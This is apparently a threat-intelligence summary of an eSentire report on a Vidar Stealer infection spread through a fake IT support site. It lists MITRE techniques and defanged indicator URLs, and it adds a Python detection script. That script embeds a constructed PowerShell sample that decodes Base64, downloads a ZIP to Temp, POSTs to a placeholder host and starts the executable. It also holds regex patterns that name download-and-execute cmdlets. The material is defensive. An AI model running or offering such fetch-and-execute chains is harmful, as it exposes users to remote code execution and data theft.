eSentire’s TRU team tracked a Vidar Stealer infection that began via a fake IT support site after a user searched for Windows Update Error solutions. The attack chain uses an obfuscated PowerShell script to download and execute a payload (Hijack Loader/IDAT Loader) and communicates with its C2 via POST requests; a YouTube video with bot-generated comments promotes the scam. #Vidar #PCHelperWizards #HijackLoader #IDATLoader #PowerShell #WindowsUpdateError #YouTube
Keypoints
- In June 2024, TRU observed a Vidar Stealer infection initiated via a fake IT support website after a Windows Update Error search.
- The site PCHelper Wizards provided an obfuscated PowerShell script with instructions to run PowerShell as Administrator.
- The script decodes Base64 content to fetch payload URLs (first stage) and downloads a ZIP to the Temp folder, followed by POST requests to a C2.
- If executed, the payload reveals additional Base64 content and notifies the C2 of success; the payload is a Hijack Loader (IDAT Loader) variant that uses netsh.exe for process injection.
- A YouTube video with bot-generated comments promotes the malicious site and links to the step-by-step PowerShell instructions.
- TRU’s recommendations emphasize monitoring PowerShell and administrative tools, user education, and caution with online solutions to common IT issues.
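The chain above (Base64 decode, download of a ZIP to Temp, POST check-in, execution, then netsh.exe as injection target) can be turned into a simple triage rule over PowerShell script-block logs and process-creation events. The following is an added example written for this summary, not tooling from eSentire or the report; the log entries, URLs, Base64 string and scoring weights are constructed for illustration, and the alert threshold is an assumption a real deployment would tune.

```python
"""Score PowerShell script-block text for the behaviour chain described in the
TRU write-up, and flag netsh.exe spawned from an unexpected parent.
All sample data below is constructed; it is not taken from the report."""
import re
from typing import Dict, List, Tuple

# Each indicator: name, compiled pattern, weight.  Weights are an assumption
# chosen so that the full chain clearly exceeds ALERT_THRESHOLD while a single
# download-to-Temp (common in benign admin scripts) does not.
INDICATORS = [
    ("base64_decode", re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I), 2),
    ("web_download", re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Invoke-RestMethod|Net\.WebClient", re.I), 2),
    ("temp_drop", re.compile(r"\$env:TEMP|\\Temp\\", re.I), 1),
    ("archive", re.compile(r"\.zip\b|Expand-Archive", re.I), 1),
    ("post_checkin", re.compile(r"-Method\s+POST|\bUploadString\b", re.I), 2),
    ("exec", re.compile(r"Invoke-Expression|\biex\b|Start-Process", re.I), 2),
]
ALERT_THRESHOLD = 6  # assumption: tune against your own baseline

# Constructed script-block entries (Event ID 4104 style).  The first mimics the
# reported chain with a placeholder Base64 value and a reserved example domain;
# the others are benign admin activity for comparison.
SAMPLE_SCRIPT_BLOCKS: List[Tuple[str, str]] = [
    ("4104-1",
     r'$u = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("QUFB")); '
     r'Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\fix.zip"; '
     r'Invoke-WebRequest -Uri "https://example.invalid/post.php?status=2" -Method POST; '
     r'Expand-Archive "$env:TEMP\fix.zip" -DestinationPath $env:TEMP; '
     r'Start-Process "$env:TEMP\fix.exe"'),
    ("4104-2", "Get-WindowsUpdateLog; Get-Service wuauserv | Restart-Service"),
    ("4104-3", r'Invoke-WebRequest -Uri "https://example.invalid/tool.zip" -OutFile "$env:TEMP\tool.zip"'),
]


def score_script_block(text: str) -> Dict[str, object]:
    """Return matched indicator names, the summed weight, and whether it alerts."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


def triage(entries: List[Tuple[str, str]]) -> List[str]:
    """Return the IDs of entries whose score reaches the alert threshold."""
    return [eid for eid, text in entries if score_script_block(text)["alert"]]


# Parent-process locations from which netsh.exe should not normally be launched.
SUSPICIOUS_PARENT_HINTS = ("\\temp\\", "\\appdata\\", "powershell")


def netsh_from_suspicious_parent(image: str, parent_image: str) -> bool:
    """True when netsh.exe is spawned by a parent living in Temp/AppData or by
    PowerShell, the pattern a loader using netsh.exe as an injection host would
    leave in process-creation telemetry."""
    if not image.lower().endswith("\\netsh.exe"):
        return False
    parent = parent_image.lower()
    return any(hint in parent for hint in SUSPICIOUS_PARENT_HINTS)


if __name__ == "__main__":
    for eid, text in SAMPLE_SCRIPT_BLOCKS:
        print(eid, score_script_block(text))
    print("alerts:", triage(SAMPLE_SCRIPT_BLOCKS))
    print("netsh flagged:", netsh_from_suspicious_parent(
        r"C:\Windows\System32\netsh.exe", r"C:\Users\u\AppData\Local\Temp\fix.exe"))
```

The scoring is deliberately additive rather than keyed on any single cmdlet: a lone Invoke-WebRequest to Temp is routine, but decode-download-POST-execute in one block is the sequence the report describes. The netsh check pairs with it because, on its own, netsh.exe running is normal; what is anomalous is the parent that launched it.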
MITRE Techniques
- [T1189] Drive-by Compromise – Initial access via a fake IT support site luring victims into executing a malicious PowerShell script. [ “The infection began when the victim performed a web search for solutions to a Windows Update Error code.” ]
- [T1059.001] PowerShell – The attacker uses an obfuscated PowerShell script to download and execute a payload. [ “The user can copy the code from the website or download and execute it.” ]
- [T1027] Obfuscated/Compressed Files and Information – The script uses an obfuscated PowerShell payload. [ “an obfuscated PowerShell script” ]
- [T1055] Process Injection – The Hijack Loader variant uses netsh.exe for process injection. [ “uses netsh.exe for process injection” ]
- [T1071] Application Layer Protocol – The script reports back to C2 via POST requests during and after payload execution. [ “make a POST request, likely reporting back to the C2 that the download stage has been completed successfully.” ]
- [T1566.001] Phishing: Spearphishing Link – YouTube bot-promoted video promotes the malicious site and links to the PowerShell instructions. [ “a YouTube video containing comments from bots falsely claiming the solution was effective and boasting the validity of the solution.” ]
Indicators of Compromise
- [URL] C2 / payload download endpoints – hxxps://ghufal.answermedia[.]site/KB/KB66958646, hxxps://ghufal.answermedia[.]site/KB/post.php?status=2
Read more: https://www.esentire.com/blog/fake-it-support-website-leading-to-vidar-infection